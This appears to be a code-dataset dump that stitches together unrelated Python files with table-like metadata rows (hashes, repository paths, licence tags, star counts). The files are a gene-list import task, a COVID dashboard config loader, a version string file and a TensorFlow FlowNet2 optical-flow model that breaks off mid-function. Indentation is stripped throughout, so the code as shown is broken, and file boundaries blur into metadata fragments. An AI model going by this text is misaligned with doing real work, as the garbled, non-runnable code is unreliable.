from variantgrid.celery import app
def create_gene_list(user, category, name, gene_names_set, modification_info=None, gene_matcher=None):
if gene_matcher is None:
gene_matcher = GeneSymbolMatcher()
gene_list = GeneList(category=category, name=name, user=user, import_status=ImportStatus.IMPORTING)
gene_list.save()
if gene_names_set:
gene_matcher.create_gene_list_gene_symbols(gene_list, gene_names_set, modification_info)
gene_list.import_status = ImportStatus.SUCCESS
gene_list.save()
return gene_list
class ImportGeneListTask(ImportTask):
MIN_GENES_TO_USE_CACHING_GENE_MATCHER = 10
def process_items(self, uploaded_file):
uploaded_gene_list, _ = UploadedGeneList.objects.get_or_create(uploaded_file=uploaded_file)
with open(uploaded_file.get_filename()) as f:
gene_list_data = f.read()
gene_names_set = tokenize_gene_symbols(gene_list_data)
if len(gene_names_set) > self.MIN_GENES_TO_USE_CACHING_GENE_MATCHER:
gene_matcher = GeneSymbolMatcher()
else:
gene_matcher = None
modification_info = "From uploaded gene_list: %s" % uploaded_file.get_filename()
gene_list = create_gene_list(uploaded_file.user, None, uploaded_file.name, gene_names_set, modification_info,
gene_matcher=gene_matcher)
uploaded_gene_list.gene_list = gene_list
uploaded_gene_list.save()
return gene_list.genelistgenesymbol_set.count()
ImportGeneListTask = app.register_task(ImportGeneListTask()) # @UndefinedVariable
| 37.653061
| 117
| 0.750678
| 968
| 0.524661
| 0
| 0
| 0
| 0
| 0
| 0
| 49
| 0.026558
|
a1dd42d9f4784232b6f6958623ffb26f5fc9185f
| 467
|
py
|
Python
|
Covid Dashboard/loadconfig.py
|
jamespilcher/daily-covid-dashboard
|
4f71eba2216dcda4b577baeb37a97a3abf4fe1bd
|
[
"MIT"
] | null | null | null |
Covid Dashboard/loadconfig.py
|
jamespilcher/daily-covid-dashboard
|
4f71eba2216dcda4b577baeb37a97a3abf4fe1bd
|
[
"MIT"
] | null | null | null |
Covid Dashboard/loadconfig.py
|
jamespilcher/daily-covid-dashboard
|
4f71eba2216dcda4b577baeb37a97a3abf4fe1bd
|
[
"MIT"
] | null | null | null |
"""Loads the config.json file and store key value pairs into variables"""
import json
with open('config.json', 'r', encoding='utf-8') as f:
config = json.load(f)
config_location_type = config['location_type']
config_location = config['location']
country = config['country']
config_covid_terms = config['covid_terms']
newsAPI_key = config['newsAPI_key']
news_outlet_websites = config['news_outlet_websites']
webpage_url = config["local_host_url"]
| 31.133333
| 74
| 0.734475
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 194
| 0.415418
|
a1de14ec6277bfec1f83bc1158b25a9e6f73c868
| 65
|
py
|
Python
|
autoprotocol/version.py
|
kevin-ss-kim/autoprotocol-python
|
f55818e31b5c49bc093291f3ecc452f2b061e0a9
|
[
"BSD-3-Clause"
] | null | null | null |
autoprotocol/version.py
|
kevin-ss-kim/autoprotocol-python
|
f55818e31b5c49bc093291f3ecc452f2b061e0a9
|
[
"BSD-3-Clause"
] | null | null | null |
autoprotocol/version.py
|
kevin-ss-kim/autoprotocol-python
|
f55818e31b5c49bc093291f3ecc452f2b061e0a9
|
[
"BSD-3-Clause"
] | null | null | null |
"""Maintains current version of package"""
__version__ = "6.1.2"
| 21.666667
| 42
| 0.707692
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 49
| 0.753846
|
a1df17bbb39f33b932712fb69914ace1053665c5
| 51,350
|
py
|
Python
|
models/flownet2.py
|
D-Nilsson/GRFP
|
539fe2a9ecbd5daf60e20ce56af872d90ba60a4b
|
[
"MIT"
] | 58
|
2018-06-13T13:58:51.000Z
|
2022-03-08T03:07:10.000Z
|
models/flownet2.py
|
yyyyqy/GRFP
|
539fe2a9ecbd5daf60e20ce56af872d90ba60a4b
|
[
"MIT"
] | 13
|
2018-07-10T07:50:54.000Z
|
2021-06-09T17:55:16.000Z
|
models/flownet2.py
|
yyyyqy/GRFP
|
539fe2a9ecbd5daf60e20ce56af872d90ba60a4b
|
[
"MIT"
] | 11
|
2018-06-13T17:00:42.000Z
|
2022-03-01T03:15:24.000Z
|
import glob, os
import numpy as np
import tensorflow as tf
import tensorflow.contrib.graph_editor as ge
class Flownet2:
def __init__(self, bilinear_warping_module):
self.weights = dict()
for key, shape in self.all_variables():
self.weights[key] = tf.get_variable(key, shape=shape)
self.bilinear_warping_module = bilinear_warping_module
def leaky_relu(self, x, s):
assert s > 0 and s < 1, "Wrong s"
return tf.maximum(x, s*x)
def warp(self, x, flow):
return self.bilinear_warping_module.bilinear_warping(x, tf.stack([flow[:,:,:,1], flow[:,:,:,0]], axis=3))
# flip true -> [:,:,:,0] y axis downwards
# [:,:,:,1] x axis
# as in matrix indexing
#
# false returns 0->x, 1->y
def __call__(self, im0, im1, flip=True):
f = self.get_blobs(im0, im1)['predict_flow_final']
if flip:
f = tf.stack([f[:,:,:,1], f[:,:,:,0]], axis=3)
return f
def get_optimizer(self, flow, target, learning_rate=1e-4):
#flow = self.__call__(im0, im1)
loss = tf.reduce_sum(flow * target) # target holding the gradients!
opt = tf.train.AdamOptimizer(learning_rate=learning_rate, beta1=0.95, beta2=0.99, epsilon=1e-8)
opt = opt.minimize(loss, var_list=
# [v for k,v in self.weights.iteritems() if (k.startswith('net3_') or k.startswith('netsd_') or k.startswith('fuse_'))])
[v for k,v in self.weights.iteritems() if ((k.startswith('net3_') or k.startswith('netsd_') or k.startswith('fuse_')) and not ('upsample' in k or 'deconv' in k))])
return opt, loss
# If I run the network with large images (1024x2048) it crashes due to memory
# constraints on a 12Gb titan X.
# See https://github.com/tensorflow/tensorflow/issues/5816#issuecomment-268710077
# for a possible explanation. I fix it by adding run_after in the section with
# the correlation layer so that 441 large tensors are not allocated at the same time
def run_after(self, a_tensor, b_tensor):
"""Force a to run after b"""
ge.reroute.add_control_inputs(a_tensor.op, [b_tensor.op])
# without epsilon I get nan-errors when I backpropagate
def l2_norm(self, x):
return tf.sqrt(tf.maximum(1e-5, tf.reduce_sum(x**2, axis=3, keep_dims=True)))
def get_blobs(self, im0, im1):
blobs = dict()
batch_size = tf.to_int32(tf.shape(im0)[0])
width = tf.to_int32(tf.shape(im0)[2])
height = tf.to_int32(tf.shape(im0)[1])
TARGET_WIDTH = width
TARGET_HEIGHT = height
divisor = 64.
ADAPTED_WIDTH = tf.to_int32(tf.ceil(tf.to_float(width)/divisor) * divisor)
ADAPTED_HEIGHT = tf.to_int32(tf.ceil(tf.to_float(height)/divisor) * divisor)
SCALE_WIDTH = tf.to_float(width) / tf.to_float(ADAPTED_WIDTH);
SCALE_HEIGHT = tf.to_float(height) / tf.to_float(ADAPTED_HEIGHT);
blobs['img0'] = im0
blobs['img1'] = im1
blobs['img0s'] = blobs['img0']*0.00392156862745098
blobs['img1s'] = blobs['img1']*0.00392156862745098
#mean = np.array([0.411451, 0.432060, 0.450141])
mean = np.array([0.37655231, 0.39534855, 0.40119368])
blobs['img0_nomean'] = blobs['img0s'] - mean
blobs['img1_nomean'] = blobs['img1s'] - mean
blobs['img0_nomean_resize'] = tf.image.resize_bilinear(blobs['img0_nomean'], size=[ADAPTED_HEIGHT, ADAPTED_WIDTH], align_corners=True)
blobs['img1_nomean_resize'] = tf.image.resize_bilinear(blobs['img1_nomean'], size=[ADAPTED_HEIGHT, ADAPTED_WIDTH], align_corners=True)
blobs['conv1a'] = tf.pad(blobs['img0_nomean_resize'], [[0,0], [3,3], [3,3], [0,0]])
blobs['conv1a'] = tf.nn.conv2d(blobs['conv1a'], self.weights['conv1_w'], strides=[1,2,2,1], padding="VALID") + self.weights['conv1_b']
blobs['conv1a'] = self.leaky_relu(blobs['conv1a'], 0.1)
blobs['conv1b'] = tf.pad(blobs['img1_nomean_resize'], [[0,0], [3,3], [3,3], [0,0]])
blobs['conv1b'] = tf.nn.conv2d(blobs['conv1b'], self.weights['conv1_w'], strides=[1,2,2,1], padding="VALID") + self.weights['conv1_b']
blobs['conv1b'] = self.leaky_relu(blobs['conv1b'], 0.1)
blobs['conv2a'] = tf.pad(blobs['conv1a'], [[0,0], [2,2], [2,2], [0,0]])
blobs['conv2a'] = tf.nn.conv2d(blobs['conv2a'], self.weights['conv2_w'], strides=[1,2,2,1], padding="VALID") + self.weights['conv2_b']
blobs['conv2a'] = self.leaky_relu(blobs['conv2a'], 0.1)
blobs['conv2b'] = tf.pad(blobs['conv1b'], [[0,0], [2,2], [2,2], [0,0]])
blobs['conv2b'] = tf.nn.conv2d(blobs['conv2b'], self.weights['conv2_w'], strides=[1,2,2,1], padding="VALID") + self.weights['conv2_b']
blobs['conv2b'] = self.leaky_relu(blobs['conv2b'], 0.1)
blobs['conv3a'] = tf.pad(blobs['conv2a'], [[0,0], [2,2], [2,2], [0,0]])
blobs['conv3a'] = tf.nn.conv2d(blobs['conv3a'], self.weights['conv3_w'], strides=[1,2,2,1], padding="VALID") + self.weights['conv3_b']
blobs['conv3a'] = self.leaky_relu(blobs['conv3a'], 0.1)
blobs['conv3b'] = tf.pad(blobs['conv2b'], [[0,0], [2,2], [2,2], [0,0]])
blobs['conv3b'] = tf.nn.conv2d(blobs['conv3b'], self.weights['conv3_w'], strides=[1,2,2,1], padding="VALID") + self.weights['conv3_b']
blobs['conv3b'] = self.leaky_relu(blobs['conv3b'], 0.1)
# this might be considered a bit hacky
tmp = []
x1_l = []
x2_l = []
for di in range(-20, 21, 2):
for dj in range(-20, 21, 2):
x1 = tf.pad(blobs['conv3a'], [[0,0], [20,20], [20,20], [0,0]])
x2 = tf.pad(blobs['conv3b'], [[0,0], [20-di,20+di], [20-dj,20+dj], [0,0]])
x1_l.append(x1)
x2_l.append(x2)
c = tf.nn.conv2d(x1*x2, tf.ones([1, 1, 256, 1])/256., strides=[1,1,1,1], padding='VALID')
tmp.append(c[:,20:-20,20:-20,:])
for i in range(len(tmp)-1):
#self.run_after(tmp[i], tmp[i+1])
self.run_after(x1_l[i], tmp[i+1])
self.run_after(x2_l[i], tmp[i+1])
blobs['corr'] = tf.concat(tmp, axis=3)
blobs['corr'] = self.leaky_relu(blobs['corr'], 0.1)
blobs['conv_redir'] = tf.nn.conv2d(blobs['conv3a'], self.weights['conv_redir_w'], strides=[1,1,1,1], padding="VALID") + self.weights['conv_redir_b']
blobs['conv_redir'] = self.leaky_relu(blobs['conv_redir'], 0.1)
blobs['blob16'] = tf.concat([blobs['conv_redir'], blobs['corr']], axis=3)
blobs['conv3_1'] = tf.nn.conv2d(blobs['blob16'], self.weights['conv3_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['conv3_1_b']
blobs['conv3_1'] = self.leaky_relu(blobs['conv3_1'], 0.1)
blobs['conv4'] = tf.pad(blobs['conv3_1'], [[0,0], [1,1], [1,1], [0,0]])
blobs['conv4'] = tf.nn.conv2d(blobs['conv4'], self.weights['conv4_w'], strides=[1,2,2,1], padding="VALID") + self.weights['conv4_b']
blobs['conv4'] = self.leaky_relu(blobs['conv4'], 0.1)
blobs['conv4_1'] = tf.nn.conv2d(blobs['conv4'], self.weights['conv4_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['conv4_1_b']
blobs['conv4_1'] = self.leaky_relu(blobs['conv4_1'], 0.1)
blobs['conv5'] = tf.pad(blobs['conv4_1'], [[0,0], [1,1], [1,1], [0,0]])
blobs['conv5'] = tf.nn.conv2d(blobs['conv5'], self.weights['conv5_w'], strides=[1,2,2,1], padding="VALID") + self.weights['conv5_b']
blobs['conv5'] = self.leaky_relu(blobs['conv5'], 0.1)
blobs['conv5_1'] = tf.nn.conv2d(blobs['conv5'], self.weights['conv5_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['conv5_1_b']
blobs['conv5_1'] = self.leaky_relu(blobs['conv5_1'], 0.1)
blobs['conv6'] = tf.pad(blobs['conv5_1'], [[0,0], [1,1], [1,1], [0,0]])
blobs['conv6'] = tf.nn.conv2d(blobs['conv6'], self.weights['conv6_w'], strides=[1,2,2,1], padding="VALID") + self.weights['conv6_b']
blobs['conv6'] = self.leaky_relu(blobs['conv6'], 0.1)
blobs['conv6_1'] = tf.nn.conv2d(blobs['conv6'], self.weights['conv6_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['conv6_1_b']
blobs['conv6_1'] = self.leaky_relu(blobs['conv6_1'], 0.1)
blobs['predict_flow6'] = tf.nn.conv2d(blobs['conv6_1'], self.weights['Convolution1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['Convolution1_b']
blobs['deconv5'] = tf.nn.conv2d_transpose(blobs['conv6_1'], self.weights['deconv5_w'], output_shape=[batch_size, ADAPTED_HEIGHT/32, ADAPTED_WIDTH/32, 512], strides=[1,2,2,1]) + self.weights['deconv5_b']
blobs['deconv5'] = self.leaky_relu(blobs['deconv5'], 0.1)
blobs['upsampled_flow6_to_5'] = tf.nn.conv2d_transpose(blobs['predict_flow6'], self.weights['upsample_flow6to5_w'], output_shape=[batch_size, ADAPTED_HEIGHT/32, ADAPTED_WIDTH/32, 2], strides=[1,2,2,1]) + self.weights['upsample_flow6to5_b']
blobs['concat5'] = tf.concat([blobs['conv5_1'], blobs['deconv5'], blobs['upsampled_flow6_to_5']], axis=3)
blobs['predict_flow5'] = tf.pad(blobs['concat5'], [[0,0], [1,1], [1,1], [0,0]])
blobs['predict_flow5'] = tf.nn.conv2d(blobs['predict_flow5'], self.weights['Convolution2_w'], strides=[1,1,1,1], padding="VALID") + self.weights['Convolution2_b']
blobs['deconv4'] = tf.nn.conv2d_transpose(blobs['concat5'], self.weights['deconv4_w'], output_shape=[batch_size, ADAPTED_HEIGHT/16, ADAPTED_WIDTH/16, 256], strides=[1,2,2,1]) + self.weights['deconv4_b']
blobs['deconv4'] = self.leaky_relu(blobs['deconv4'], 0.1)
blobs['upsampled_flow5_to_4'] = tf.nn.conv2d_transpose(blobs['predict_flow5'], self.weights['upsample_flow5to4_w'], output_shape=[batch_size, ADAPTED_HEIGHT/16, ADAPTED_WIDTH/16, 2], strides=[1,2,2,1]) + self.weights['upsample_flow5to4_b']
blobs['concat4'] = tf.concat([blobs['conv4_1'], blobs['deconv4'], blobs['upsampled_flow5_to_4']], axis=3)
blobs['predict_flow4'] = tf.nn.conv2d(blobs['concat4'], self.weights['Convolution3_w'], strides=[1,1,1,1], padding="SAME") + self.weights['Convolution3_b']
blobs['deconv3'] = tf.nn.conv2d_transpose(blobs['concat4'], self.weights['deconv3_w'], output_shape=[batch_size, ADAPTED_HEIGHT/8, ADAPTED_WIDTH/8, 128], strides=[1,2,2,1]) + self.weights['deconv3_b']
blobs['deconv3'] = self.leaky_relu(blobs['deconv3'], 0.1)
blobs['upsampled_flow4_to_3'] = tf.nn.conv2d_transpose(blobs['predict_flow4'], self.weights['upsample_flow4to3_w'], output_shape=[batch_size, ADAPTED_HEIGHT/8, ADAPTED_WIDTH/8, 2], strides=[1,2,2,1]) + self.weights['upsample_flow4to3_b']
blobs['concat3'] = tf.concat([blobs['conv3_1'], blobs['deconv3'], blobs['upsampled_flow4_to_3']], axis=3)
blobs['predict_flow3'] = tf.nn.conv2d(blobs['concat3'], self.weights['Convolution4_w'], strides=[1,1,1,1], padding="SAME") + self.weights['Convolution4_b']
blobs['deconv2'] = tf.nn.conv2d_transpose(blobs['concat3'], self.weights['deconv2_w'], output_shape=[batch_size, ADAPTED_HEIGHT/4, ADAPTED_WIDTH/4, 64], strides=[1,2,2,1]) + self.weights['deconv2_b']
blobs['deconv2'] = self.leaky_relu(blobs['deconv2'], 0.1)
blobs['upsampled_flow3_to_2'] = tf.nn.conv2d_transpose(blobs['predict_flow3'], self.weights['upsample_flow3to2_w'], output_shape=[batch_size, ADAPTED_HEIGHT/4, ADAPTED_WIDTH/4, 2], strides=[1,2,2,1]) + self.weights['upsample_flow3to2_b']
blobs['concat2'] = tf.concat([blobs['conv2a'], blobs['deconv2'], blobs['upsampled_flow3_to_2']], axis=3)
blobs['predict_flow2'] = tf.nn.conv2d(blobs['concat2'], self.weights['Convolution5_w'], strides=[1,1,1,1], padding="SAME") + self.weights['Convolution5_b']
blobs['blob41'] = blobs['predict_flow2'] * 20.
blobs['blob42'] = tf.image.resize_bilinear(blobs['blob41'], size=[ADAPTED_HEIGHT, ADAPTED_WIDTH], align_corners=True)
blobs['blob43'] = self.warp(blobs['img1_nomean_resize'], blobs['blob42'])
blobs['blob44'] = blobs['img0_nomean_resize'] - blobs['blob43']
#blobs['blob45'] = tf.sqrt(1e-8+tf.reduce_sum(blobs['blob44']**2, axis=3, keep_dims=True))
blobs['blob45'] = self.l2_norm(blobs['blob44'])
blobs['blob46'] = 0.05*blobs['blob42']
blobs['blob47'] = tf.concat([blobs['img0_nomean_resize'], blobs['img1_nomean_resize'], blobs['blob43'], blobs['blob46'], blobs['blob45']], axis=3)
####################################################################################
####################################################################################
####################################################################################
###################### END OF THE FIRST BRANCH #####################################
####################################################################################
####################################################################################
####################################################################################
blobs['blob48'] = tf.pad(blobs['blob47'], [[0,0], [3,3], [3,3], [0,0]])
blobs['blob48'] = tf.nn.conv2d(blobs['blob48'], self.weights['net2_conv1_w'], strides=[1,2,2,1], padding="VALID") + self.weights['net2_conv1_b']
blobs['blob48'] = self.leaky_relu(blobs['blob48'], 0.1)
blobs['blob49'] = tf.pad(blobs['blob48'], [[0,0], [2,2], [2, 2], [0,0]])
blobs['blob49'] = tf.nn.conv2d(blobs['blob49'], self.weights['net2_conv2_w'], strides=[1,2,2,1], padding="VALID") + self.weights['net2_conv2_b']
blobs['blob49'] = self.leaky_relu(blobs['blob49'], 0.1)
blobs['blob50'] = tf.pad(blobs['blob49'], [[0,0], [2,2], [2,2], [0,0]])
blobs['blob50'] = tf.nn.conv2d(blobs['blob50'], self.weights['net2_conv3_w'], strides=[1,2,2,1], padding="VALID") + self.weights['net2_conv3_b']
blobs['blob50'] = self.leaky_relu(blobs['blob50'], 0.1)
blobs['blob51'] = tf.nn.conv2d(blobs['blob50'], self.weights['net2_conv3_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['net2_conv3_1_b']
blobs['blob51'] = self.leaky_relu(blobs['blob51'], 0.1)
blobs['blob52'] = tf.pad(blobs['blob51'], [[0,0], [1,1], [1,1], [0,0]])
blobs['blob52'] = tf.nn.conv2d(blobs['blob52'], self.weights['net2_conv4_w'], strides=[1,2,2,1], padding="VALID") + self.weights['net2_conv4_b']
blobs['blob52'] = self.leaky_relu(blobs['blob52'], 0.1)
blobs['blob53'] = tf.nn.conv2d(blobs['blob52'], self.weights['net2_conv4_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['net2_conv4_1_b']
blobs['blob53'] = self.leaky_relu(blobs['blob53'], 0.1)
blobs['blob54'] = tf.pad(blobs['blob53'], [[0,0], [1,1], [1,1], [0,0]])
blobs['blob54'] = tf.nn.conv2d(blobs['blob54'], self.weights['net2_conv5_w'], strides=[1,2,2,1], padding="VALID") + self.weights['net2_conv5_b']
blobs['blob54'] = self.leaky_relu(blobs['blob54'], 0.1)
blobs['blob55'] = tf.nn.conv2d(blobs['blob54'], self.weights['net2_conv5_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['net2_conv5_1_b']
blobs['blob55'] = self.leaky_relu(blobs['blob55'], 0.1)
blobs['blob56'] = tf.pad(blobs['blob55'], [[0,0], [1,1], [1,1], [0,0]])
blobs['blob56'] = tf.nn.conv2d(blobs['blob56'], self.weights['net2_conv6_w'], strides=[1,2,2,1], padding="VALID") + self.weights['net2_conv6_b']
blobs['blob56'] = self.leaky_relu(blobs['blob56'], 0.1)
blobs['blob57'] = tf.nn.conv2d(blobs['blob56'], self.weights['net2_conv6_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['net2_conv6_1_b']
blobs['blob57'] = self.leaky_relu(blobs['blob57'], 0.1)
blobs['blob58'] = tf.nn.conv2d(blobs['blob57'], self.weights['net2_predict_conv6_w'], strides=[1,1,1,1], padding="SAME") + self.weights['net2_predict_conv6_b']
blobs['blob59'] = tf.nn.conv2d_transpose(blobs['blob57'], self.weights['net2_deconv5_w'], output_shape=[batch_size, ADAPTED_HEIGHT/32, ADAPTED_WIDTH/32, 512], strides=[1,2,2,1]) + self.weights['net2_deconv5_b']
blobs['blob59'] = self.leaky_relu(blobs['blob59'], 0.1)
blobs['blob60'] = tf.nn.conv2d_transpose(blobs['predict_flow6'], self.weights['net2_net2_upsample_flow6to5_w'], output_shape=[batch_size, ADAPTED_HEIGHT/32, ADAPTED_WIDTH/32, 2], strides=[1,2,2,1]) + self.weights['net2_net2_upsample_flow6to5_b']
blobs['blob61'] = tf.concat([blobs['blob55'], blobs['blob59'], blobs['blob60']], axis=3)
blobs['blob62'] = tf.nn.conv2d(blobs['blob61'], self.weights['net2_predict_conv5_w'], strides=[1,1,1,1], padding="SAME") + self.weights['net2_predict_conv5_b']
blobs['blob63'] = tf.nn.conv2d_transpose(blobs['blob61'], self.weights['net2_deconv4_w'], output_shape=[batch_size, ADAPTED_HEIGHT/16, ADAPTED_WIDTH/16, 256], strides=[1,2,2,1]) + self.weights['net2_deconv4_b']
blobs['blob63'] = self.leaky_relu(blobs['blob63'], 0.1)
blobs['blob64'] = tf.nn.conv2d_transpose(blobs['blob62'], self.weights['net2_net2_upsample_flow5to4_w'], output_shape=[batch_size, ADAPTED_HEIGHT/16, ADAPTED_WIDTH/16, 2], strides=[1,2,2,1]) + self.weights['net2_net2_upsample_flow5to4_b']
blobs['blob65'] = tf.concat([blobs['blob53'], blobs['blob63'], blobs['blob64']], axis=3)
blobs['blob66'] = tf.nn.conv2d(blobs['blob65'], self.weights['net2_predict_conv4_w'], strides=[1,1,1,1], padding="SAME") + self.weights['net2_predict_conv4_b']
blobs['blob67'] = tf.nn.conv2d_transpose(blobs['blob65'], self.weights['net2_deconv3_w'], output_shape=[batch_size, ADAPTED_HEIGHT/8, ADAPTED_WIDTH/8, 128], strides=[1,2,2,1]) + self.weights['net2_deconv3_b']
blobs['blob67'] = self.leaky_relu(blobs['blob67'], 0.1)
blobs['blob68'] = tf.nn.conv2d_transpose(blobs['blob66'], self.weights['net2_net2_upsample_flow4to3_w'], output_shape=[batch_size, ADAPTED_HEIGHT/8, ADAPTED_WIDTH/8, 2], strides=[1,2,2,1]) + self.weights['net2_net2_upsample_flow4to3_b']
blobs['blob69'] = tf.concat([blobs['blob51'], blobs['blob67'], blobs['blob68']], axis=3)
blobs['blob70'] = tf.nn.conv2d(blobs['blob69'], self.weights['net2_predict_conv3_w'], strides=[1,1,1,1], padding="SAME") + self.weights['net2_predict_conv3_b']
blobs['blob71'] = tf.nn.conv2d_transpose(blobs['blob69'], self.weights['net2_deconv2_w'], output_shape=[batch_size, ADAPTED_HEIGHT/4, ADAPTED_WIDTH/4, 64], strides=[1,2,2,1]) + self.weights['net2_deconv2_b']
blobs['blob71'] = self.leaky_relu(blobs['blob71'], 0.1)
blobs['blob72'] = tf.nn.conv2d_transpose(blobs['blob70'], self.weights['net2_net2_upsample_flow3to2_w'], output_shape=[batch_size, ADAPTED_HEIGHT/4, ADAPTED_WIDTH/4, 2], strides=[1,2,2,1]) + self.weights['net2_net2_upsample_flow3to2_b']
blobs['blob73'] = tf.concat([blobs['blob49'], blobs['blob71'], blobs['blob72']], axis=3)
blobs['blob74'] = tf.nn.conv2d(blobs['blob73'], self.weights['net2_predict_conv2_w'], strides=[1,1,1,1], padding="SAME") + self.weights['net2_predict_conv2_b']
blobs['blob75'] = blobs['blob74'] * 20.
blobs['blob76'] = tf.image.resize_bilinear(blobs['blob75'], size=[ADAPTED_HEIGHT, ADAPTED_WIDTH], align_corners=True)
blobs['blob77'] = self.warp(blobs['img1_nomean_resize'], blobs['blob76'])
blobs['blob78'] = blobs['img0_nomean_resize'] - blobs['blob77']
#blobs['blob79'] = tf.sqrt(1e-8+tf.reduce_sum(blobs['blob78']**2, axis=3, keep_dims=True))
blobs['blob79'] = self.l2_norm(blobs['blob78'])
blobs['blob80'] = 0.05*blobs['blob76']
blobs['blob81'] = tf.concat([blobs['img0_nomean_resize'], blobs['img1_nomean_resize'], blobs['blob77'], blobs['blob80'], blobs['blob79']], axis=3)
####################################################################################
####################################################################################
####################################################################################
###################### END OF THE SECOND BRANCH ####################################
####################################################################################
####################################################################################
####################################################################################
blobs['blob82'] = tf.pad(blobs['blob81'], [[0,0], [3,3], [3,3], [0,0]])
blobs['blob82'] = tf.nn.conv2d(blobs['blob82'], self.weights['net3_conv1_w'], strides=[1,2,2,1], padding="VALID") + self.weights['net3_conv1_b']
blobs['blob82'] = self.leaky_relu(blobs['blob82'], 0.1)
blobs['blob83'] = tf.pad(blobs['blob82'], [[0,0], [2,2], [2, 2], [0,0]])
blobs['blob83'] = tf.nn.conv2d(blobs['blob83'], self.weights['net3_conv2_w'], strides=[1,2,2,1], padding="VALID") + self.weights['net3_conv2_b']
blobs['blob83'] = self.leaky_relu(blobs['blob83'], 0.1)
blobs['blob84'] = tf.pad(blobs['blob83'], [[0,0], [2,2], [2,2], [0,0]])
blobs['blob84'] = tf.nn.conv2d(blobs['blob84'], self.weights['net3_conv3_w'], strides=[1,2,2,1], padding="VALID") + self.weights['net3_conv3_b']
blobs['blob84'] = self.leaky_relu(blobs['blob84'], 0.1)
blobs['blob85'] = tf.nn.conv2d(blobs['blob84'], self.weights['net3_conv3_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['net3_conv3_1_b']
blobs['blob85'] = self.leaky_relu(blobs['blob85'], 0.1)
blobs['blob86'] = tf.pad(blobs['blob85'], [[0,0], [1,1], [1,1], [0,0]])
blobs['blob86'] = tf.nn.conv2d(blobs['blob86'], self.weights['net3_conv4_w'], strides=[1,2,2,1], padding="VALID") + self.weights['net3_conv4_b']
blobs['blob86'] = self.leaky_relu(blobs['blob86'], 0.1)
blobs['blob87'] = tf.nn.conv2d(blobs['blob86'], self.weights['net3_conv4_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['net3_conv4_1_b']
blobs['blob87'] = self.leaky_relu(blobs['blob87'], 0.1)
blobs['blob88'] = tf.pad(blobs['blob87'], [[0,0], [1,1], [1,1], [0,0]])
blobs['blob88'] = tf.nn.conv2d(blobs['blob88'], self.weights['net3_conv5_w'], strides=[1,2,2,1], padding="VALID") + self.weights['net3_conv5_b']
blobs['blob88'] = self.leaky_relu(blobs['blob88'], 0.1)
blobs['blob89'] = tf.nn.conv2d(blobs['blob88'], self.weights['net3_conv5_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['net3_conv5_1_b']
blobs['blob89'] = self.leaky_relu(blobs['blob89'], 0.1)
blobs['blob90'] = tf.pad(blobs['blob89'], [[0,0], [1,1], [1,1], [0,0]])
blobs['blob90'] = tf.nn.conv2d(blobs['blob90'], self.weights['net3_conv6_w'], strides=[1,2,2,1], padding="VALID") + self.weights['net3_conv6_b']
blobs['blob90'] = self.leaky_relu(blobs['blob90'], 0.1)
blobs['blob91'] = tf.nn.conv2d(blobs['blob90'], self.weights['net3_conv6_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['net3_conv6_1_b']
blobs['blob91'] = self.leaky_relu(blobs['blob91'], 0.1)
blobs['blob92'] = tf.nn.conv2d(blobs['blob91'], self.weights['net3_predict_conv6_w'], strides=[1,1,1,1], padding="SAME") + self.weights['net3_predict_conv6_b']
blobs['blob93'] = tf.nn.conv2d_transpose(blobs['blob91'], self.weights['net3_deconv5_w'], output_shape=[batch_size, ADAPTED_HEIGHT/32, ADAPTED_WIDTH/32, 512], strides=[1,2,2,1]) + self.weights['net3_deconv5_b']
blobs['blob93'] = self.leaky_relu(blobs['blob93'], 0.1)
blobs['blob94'] = tf.nn.conv2d_transpose(blobs['blob92'], self.weights['net3_net3_upsample_flow6to5_w'], output_shape=[batch_size, ADAPTED_HEIGHT/32, ADAPTED_WIDTH/32, 2], strides=[1,2,2,1]) + self.weights['net3_net3_upsample_flow6to5_b']
blobs['blob95'] = tf.concat([blobs['blob89'], blobs['blob93'], blobs['blob94']], axis=3)
blobs['blob96'] = tf.nn.conv2d(blobs['blob95'], self.weights['net3_predict_conv5_w'], strides=[1,1,1,1], padding="SAME") + self.weights['net3_predict_conv5_b']
blobs['blob97'] = tf.nn.conv2d_transpose(blobs['blob95'], self.weights['net3_deconv4_w'], output_shape=[batch_size, ADAPTED_HEIGHT/16, ADAPTED_WIDTH/16, 256], strides=[1,2,2,1]) + self.weights['net3_deconv4_b']
blobs['blob97'] = self.leaky_relu(blobs['blob97'], 0.1)
blobs['blob98'] = tf.nn.conv2d_transpose(blobs['blob96'], self.weights['net3_net3_upsample_flow5to4_w'], output_shape=[batch_size, ADAPTED_HEIGHT/16, ADAPTED_WIDTH/16, 2], strides=[1,2,2,1]) + self.weights['net3_net3_upsample_flow5to4_b']
blobs['blob99'] = tf.concat([blobs['blob87'], blobs['blob97'], blobs['blob98']], axis=3)
blobs['blob100'] = tf.nn.conv2d(blobs['blob99'], self.weights['net3_predict_conv4_w'], strides=[1,1,1,1], padding="SAME") + self.weights['net3_predict_conv4_b']
blobs['blob101'] = tf.nn.conv2d_transpose(blobs['blob99'], self.weights['net3_deconv3_w'], output_shape=[batch_size, ADAPTED_HEIGHT/8, ADAPTED_WIDTH/8, 128], strides=[1,2,2,1]) + self.weights['net3_deconv3_b']
blobs['blob101'] = self.leaky_relu(blobs['blob101'], 0.1)
blobs['blob102'] = tf.nn.conv2d_transpose(blobs['blob100'], self.weights['net3_net3_upsample_flow4to3_w'], output_shape=[batch_size, ADAPTED_HEIGHT/8, ADAPTED_WIDTH/8, 2], strides=[1,2,2,1]) + self.weights['net3_net3_upsample_flow4to3_b']
blobs['blob103'] = tf.concat([blobs['blob85'], blobs['blob101'], blobs['blob102']], axis=3)
blobs['blob104'] = tf.nn.conv2d(blobs['blob103'], self.weights['net3_predict_conv3_w'], strides=[1,1,1,1], padding="SAME") + self.weights['net3_predict_conv3_b']
